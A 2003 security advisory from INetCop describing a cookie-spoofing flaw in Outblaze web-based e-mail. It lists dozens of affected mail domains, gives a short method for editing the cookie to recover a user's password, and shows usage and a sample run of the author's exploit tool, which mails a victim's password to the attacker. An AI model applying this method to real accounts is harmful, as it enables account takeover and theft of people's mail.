outblaze.txt

`  
  
==========================================  
INetCop Security Advisory #2003-0x82-014.b  
==========================================  
  
  
* Title: ++Danger++ Outblaze Web based e-mail that is exposed in very dangerous state !!!  
  
  
0x01. Description  
  
  
Hackermail.com (Outblaze Web based e-mail) is mail service that I use.  
Last week, someone hacked `[email protected]' that I'm using.  
(hacked several people. wow, very funny kiddies !)  
  
And, I looked for the first step.  
It was problem in Outblaze Web based e-mail service.  
I also, could find again my mail password. hehe  
  
It because of cookie such as fool! Many mail users get overridden.  
I yet, did not try conversation with mail hacking criminal.  
However, It's sure that I find funny and interesting truth thanks to.  
  
++Update Advisory version #2003-0x82-014.b++  
  
I know interesting truth still more.  
This can hack almost Outblaze Web based e-mail service !!! w00h00~!  
  
  
0x02. Vulnerable Sites  
  
  
Vendor site: ? http://www.outblaze.com (Desire to visit.)  
  
+------------------------------+----------------+---------------------------+  
| mail server | vulnerable? | exploitable? |  
+------------------------------+----------------+---------------------------+  
| http://www.amrer.net | vulnerable | exploitable |  
| http://www.amuro.net | vulnerable | exploitable |  
| http://www.amuromail.com | vulnerable | exploitable |  
| http://www.astroboymail.com | vulnerable | exploitable |  
| http://www.dbzmail.com | vulnerable | exploitable |  
| http://www.doramail.com | vulnerable | exploitable |  
| http://www.glay.org | vulnerable | exploitable |  
| http://www.jpopmail.com | vulnerable | exploitable |  
| http://www.keromail.com | vulnerable | exploitable |  
| http://www.kichimail.com | vulnerable | exploitable |  
| http://www.norikomail.com | vulnerable | exploitable |  
| http://www.otakumail.com | vulnerable | exploitable |  
| http://www.smapxsmap.net | vulnerable | - Don't change hint |  
| http://www.uymail.com | vulnerable | exploitable |  
| http://www.yyhmail.com | vulnerable | exploitable |  
| http://mail.china139.com | vulnerable | exploitable |  
| http://www.mailasia.com | vulnerable | exploitable |  
| http://www.aaronkwok.net | vulnerable | exploitable |  
| http://www.bsdmail.org | vulnerable | exploitable |  
| http://www.bsdmail.com | vulnerable | exploitable |  
| http://www.ezagenda.com | vulnerable | - Don't change hint |  
| http://www.fastermail.com | vulnerable | - Don't change hint |  
| http://www.wongfaye.com | vulnerable | exploitable |  
| http://www.graffiti.net | vulnerable | exploitable |  
| http://www.hackermail.com | vulnerable | exploitable |  
| http://www.kellychen.com | vulnerable | exploitable |  
| http://www.leonlai.net | vulnerable | exploitable |  
| http://www.linuxmail.org | vulnerable | exploitable |  
| http://www.outblaze.net | vulnerable | exploitable |  
| http://www.outblaze.org | vulnerable | exploitable |  
| http://www.outgun.com | vulnerable | exploitable |  
| http://www.surfy.net | vulnerable | exploitable |  
| http://www.pakistans.com | vulnerable | exploitable |  
| http://www.jaydemail.com | vulnerable | exploitable |  
| http://www.joinme.com | vulnerable | exploitable |  
| http://www.marchmail.com | vulnerable | exploitable |  
| http://mail.nctta.org | vulnerable | exploitable |  
| http://mail.portugalnet.com | vulnerable | exploitable |  
| http://boardermail.com | vulnerable | exploitable |  
| http://www.mailpuppy.com | vulnerable | exploitable |  
| http://www.melodymail.com | vulnerable | - Don't change hint |  
| http://www.twinstarsmail.com | vulnerable | - Don't change hint |  
| http://www.purinmail.com | vulnerable | exploitable |  
| http://www.gundamfan.com | vulnerable | - Don't change hint |  
| http://www.slamdunkfan.com | vulnerable | - Don't change hint |  
| http://www.movemail.com | vulnerable | - Don't change hint |  
| http://startvclub.com | vulnerable | - Don't change hint |  
| http://ultrapostman.com | vulnerable | exploitable |  
| http://mail.sailormoon.com | vulnerable | exploitable |  
+------------------------------+----------------+---------------------------+  
  
* We confirmed already and all.  
If there is other places that use Outblaze, inform.  
  
  
0x03. Exploit  
  
  
Cookie Spooing Exploit method is very simple.  
  
1. First, read user's cookie.  
2. Change mail id, domain, etc... cookie informations.  
3. And, deceive it. hehe, it's very easy?  
  
Its application is very simple.  
Hack user's information page. (information correction)  
Thereafter, can find out password.  
  
yah0o ~!  
I exhibited exploit to my friends not long ago.  
The following is my xploit execution result.  
  
  
bash$ ./0x82-eat_outblaze_0dayxpl  
  
Outblaze Web based e-mail User Cookie Spoofing 0day exploit  
by Xpl017Elz.  
  
Usage: ./0x82-eat_outblaze_0dayxpl -option [argument]  
  
-t [target num] - target mail server.  
-i [mail id] - target mail id.  
-m [mail addr] - your mail address.  
-h - help information.  
  
Select target mail number:  
  
{0} amrer.net  
{1} amuro.net  
{2} amuromail.com  
{3} astroboymail.com  
{4} dbzmail.com  
{5} doramail.com  
{6} glay.org  
{7} jpopmail.com  
{8} keromail.com  
{9} kichimail.com  
{10} norikomail.com  
{11} otakumail.com  
{12} smapxsmap.net  
{13} uymail.com  
{14} yyhmail.com  
{15} china139.com  
{16} mailasia.com  
{17} aaronkwok.net  
{18} bsdmail.com  
{19} bsdmail.org  
{20} ezagenda.com  
{21} fastermail.com  
{22} wongfaye.com  
{23} graffiti.net  
{24} hackermail.com  
{25} kellychen.com  
{26} leonlai.net  
{27} linuxmail.org  
{28} outblaze.net  
{29} outblaze.org  
{30} outgun.com  
{31} surfy.net  
{32} pakistans.com  
{33} jaydemail.com  
{34} joinme.com  
{35} marchmail.com  
{36} nctta.org  
{37} portugalnet.com  
{38} boardermail.com  
{39} mailpuppy.com  
{40} melodymail.com  
{41} twinstarsmail.com  
{42} purinmail.com  
{43} gundamfan.com  
{44} slamdunkfan.com  
{45} movemail.com  
{46} startvclub.com  
{47} ultrapostman.com  
{48} sailormoon.com  
  
Example> ./0x82-eat_outblaze_0dayxpl -t 0 -i admin -m [email protected]  
  
bash$  
bash$ ./0x82-eat_outblaze_0dayxpl -t 24 -i tester -m [email protected]  
  
Outblaze Web based e-mail User Cookie Spoofing 0day exploit  
by Xpl017Elz.  
  
============================================================  
++ Cookie Spoofing Brute-force mode. ++  
  
[*] Connected to http://www.hackermail.com/.  
[*] target mail address: [email protected].  
[*] Wait, getting password:  
  
This is your password: Happy-Exploit  
  
[*] Password sent out by your e-mail ([email protected]).  
============================================================  
  
bash$  
  
  
This code may have spewed password if put ID that want to attack.  
Also, password is sent out your mail.  
  
  
0x04. Patch  
  
  
--  
  
There is document about cookie security very much.  
We notified this truth to Outblaze Web based e-mail solution before.  
Soon is going to become patch.  
  
--  
  
Thank you.  
  
P.S: Sorry, for my poor english.  
  
  
--  
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.  
  
MSN & E-mail: szoahc(at)hotmail(dot)com,  
xploit(at)hackermail(dot)com  
  
INetCop Security Home: http://www.inetcop.org (Korean hacking game)  
My World: http://x82.i21c.net & http://x82.inetcop.org  
  
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y  
--  
  
  
--   
`